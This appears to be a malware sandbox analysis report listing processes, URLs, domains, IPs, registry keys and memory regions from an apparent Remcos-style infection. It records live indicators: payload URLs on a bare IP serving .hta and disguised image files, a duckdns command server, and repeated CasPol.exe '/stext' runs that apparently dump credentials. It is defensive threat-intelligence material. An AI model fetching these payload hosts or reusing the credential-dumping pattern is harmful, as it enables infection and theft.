C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oyzblyj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7A10.tmp"
"c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC85F.tmp"
"c:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP"
|
There are 29 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIF
|
107.174.146.46
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
|
107.174.146.46
|
||
http://107.174.146.46/57/RFGGVFRR.txt
|
107.174.146.46
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainJ4
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaepC:
|
unknown
|
||
http://www.imvu.comr
|
unknown
|
||
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
|
unknown
|
||
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaain
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainZ4
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
|
unknown
|
||
http://www.nirsoft.net
|
unknown
|
||
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaN
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaE
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htahttp://107.174.146.46/5
|
unknown
|
||
http://cache.btrll.com/default/Pix-1x1.gif
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...Q5
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestraino4
|
unknown
|
||
http://o.aolcdn.com/ads/adswrappermsni.js
|
unknown
|
||
http://www.msn.com/?ocid=iehp
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://static.chartbeat.com/js/chartbeat.js
|
unknown
|
||
http://www.msn.com/de-de/?ocid=iehp
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain
|
172.67.162.95
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htal
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainyX
|
unknown
|
||
http://107.174.146.46/57/picture
|
unknown
|
||
http://www.nirsoft.net/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
|
unknown
|
||
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
|
unknown
|
||
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
|
unknown
|
||
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain-v
|
unknown
|
||
http://www.imvu.com
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://contextual.media.net/
|
unknown
|
||
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
|
unknown
|
||
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
|
unknown
|
||
http://www.msn.com/
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainG4
|
unknown
|
||
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
|
unknown
|
||
https://drive.google.com
|
unknown
|
||
https://www.google.com/accounts/servicelogin
|
unknown
|
||
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
|
unknown
|
||
https://policies.yahoo.com/w3c/p3p.xml
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
http://www.msn.com/advertisement.ad.js
|
unknown
|
||
http://107.174.146.46/
|
unknown
|
||
http://b.scorecardresearch.com/beacon.js
|
unknown
|
||
http://acdn.adnxs.com/ast/ast.js
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
https://acesso.run/O
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta.NET4.0C;
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaC:
|
unknown
|
||
https://support.google.com/chrome/?p=plugin_flash
|
unknown
|
||
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
|
unknown
|
||
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
|
unknown
|
||
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
|
unknown
|
||
http://go.micros
|
unknown
|
||
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFp
|
unknown
|
||
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
|
unknown
|
||
https://acesso.run/p
|
unknown
|
||
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
|
unknown
|
||
https://login.yahoo.com/config/login
|
unknown
|
||
https://acesso.run/
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
https://acesso.run/koE
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainD4
|
unknown
|
||
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
|
unknown
|
||
https://acesso.run/d
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain~4
|
unknown
|
||
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://www.ccleaner.com/go/app_cc_pro_trialkey
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
https://contextual.media.net/8/nrrV73987.js
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestrain
|
unknown
|
||
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
|
unknown
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
https://acesso.run/)
|
unknown
|
||
http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFC:
|
unknown
|
||
http://cdn.at.atwola.com/_media/uac/msn.html
|
unknown
|
||
https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainI
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htant
|
unknown
|
||
http://www.imvu.com/k
|
unknown
|
||
http://www.ebuddy.com
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
seemebest2024rmc.duckdns.org
|
107.175.130.20
|
||
acesso.run
|
172.67.162.95
|
||
geoplugin.net
|
178.237.33.50
|
||
drive.google.com
|
142.250.184.206
|
||
drive.usercontent.google.com
|
142.250.185.65
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
107.174.146.46
|
unknown
|
United States
|
||
107.175.130.20
|
seemebest2024rmc.duckdns.org
|
United States
|
||
172.67.162.95
|
acesso.run
|
United States
|
||
104.21.74.191
|
unknown
|
United States
|
||
142.250.184.206
|
drive.google.com
|
United States
|
||
172.217.16.193
|
unknown
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
142.250.185.65
|
drive.usercontent.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_CURRENT_USER\Software\Rmc-RXIGCE
|
exepath
|
||
HKEY_CURRENT_USER\Software\Rmc-RXIGCE
|
licence
|
||
HKEY_CURRENT_USER\Software\Rmc-RXIGCE
|
time
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
7%0
|
||
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2817F
|
2817F
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
{,0
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31E59
|
31E59
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31F53
|
31F53
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3259A
|
3259A
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31F53
|
31F53
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 82 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
40EE000
|
trusted library allocation
|
page read and write
|
||
55D0000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
3709000
|
heap
|
page read and write
|
||
36B4000
|
heap
|
page read and write
|
||
41F0000
|
trusted library allocation
|
page read and write
|
||
7FFFFF88000
|
trusted library allocation
|
page readonly
|
||
42B000
|
heap
|
page read and write
|
||
20E6000
|
trusted library allocation
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
32EA000
|
trusted library allocation
|
page read and write
|
||
3504000
|
heap
|
page read and write
|
||
3A2000
|
heap
|
page read and write
|
||
567A000
|
heap
|
page read and write
|
||
3A01000
|
heap
|
page read and write
|
||
3730000
|
heap
|
page read and write
|
||
398E000
|
heap
|
page read and write
|
||
479000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
1A578000
|
stack
|
page read and write
|
||
4D94000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
DC000
|
stack
|
page read and write
|
||
5E62000
|
heap
|
page read and write
|
||
7FE8996C000
|
trusted library allocation
|
page execute and read and write
|
||
5524000
|
heap
|
page read and write
|
||
466000
|
heap
|
page read and write
|
||
371B000
|
heap
|
page read and write
|
||
140000
|
heap
|
page read and write
|
||
31A000
|
heap
|
page read and write
|
||
316000
|
heap
|
page read and write
|
||
3298000
|
trusted library allocation
|
page read and write
|
||
327A000
|
trusted library allocation
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
4CB000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
4C5000
|
heap
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
55C5000
|
heap
|
page read and write
|
||
4C8000
|
heap
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
1A64F000
|
stack
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
359000
|
heap
|
page read and write
|
||
33D000
|
heap
|
page read and write
|
||
1B380000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
5040000
|
heap
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
7FFFFF82000
|
trusted library allocation
|
page readonly
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
5D23000
|
heap
|
page read and write
|
||
36F9000
|
heap
|
page read and write
|
||
4E77000
|
heap
|
page read and write
|
||
32A7000
|
trusted library allocation
|
page read and write
|
||
3A37000
|
heap
|
page read and write
|
||
415000
|
heap
|
page read and write
|
||
2E5000
|
heap
|
page read and write
|
||
1D7C000
|
heap
|
page read and write
|
||
4556000
|
trusted library allocation
|
page read and write
|
||
3A47000
|
heap
|
page read and write
|
||
3B93000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
1BB0000
|
heap
|
page read and write
|
||
3FA000
|
heap
|
page read and write
|
||
3941000
|
heap
|
page read and write
|
||
52C0000
|
heap
|
page read and write
|
||
404000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3B8D000
|
heap
|
page read and write
|
||
1CDC000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
3EA000
|
heap
|
page read and write
|
||
1C10000
|
trusted library allocation
|
page read and write
|
||
481000
|
heap
|
page read and write
|
||
3271000
|
trusted library allocation
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
319E000
|
trusted library allocation
|
page read and write
|
||
4DD000
|
heap
|
page read and write
|
||
7756000
|
trusted library allocation
|
page read and write
|
||
54E8000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
55C7000
|
heap
|
page read and write
|
||
3A37000
|
heap
|
page read and write
|
||
47C000
|
heap
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
32EE000
|
trusted library allocation
|
page read and write
|
||
5672000
|
heap
|
page read and write
|
||
3B66000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
584F000
|
trusted library allocation
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
2E5000
|
heap
|
page read and write
|
||
7FE89A4C000
|
trusted library allocation
|
page read and write
|
||
3C6000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
51D9000
|
heap
|
page read and write
|
||
36E7000
|
heap
|
page read and write
|
||
1A61E000
|
heap
|
page execute and read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
3B6F000
|
heap
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
31A5000
|
trusted library allocation
|
page read and write
|
||
1CDD000
|
direct allocation
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
496000
|
heap
|
page read and write
|
||
552E000
|
heap
|
page read and write
|
||
3195000
|
trusted library allocation
|
page read and write
|
||
55A000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
228000
|
heap
|
page read and write
|
||
203F000
|
stack
|
page read and write
|
||
253000
|
heap
|
page read and write
|
||
380F000
|
stack
|
page read and write
|
||
5E6E000
|
heap
|
page read and write
|
||
424000
|
heap
|
page read and write
|
||
1B80000
|
heap
|
page read and write
|
||
32FD000
|
trusted library allocation
|
page read and write
|
||
55C5000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
7FE89AA0000
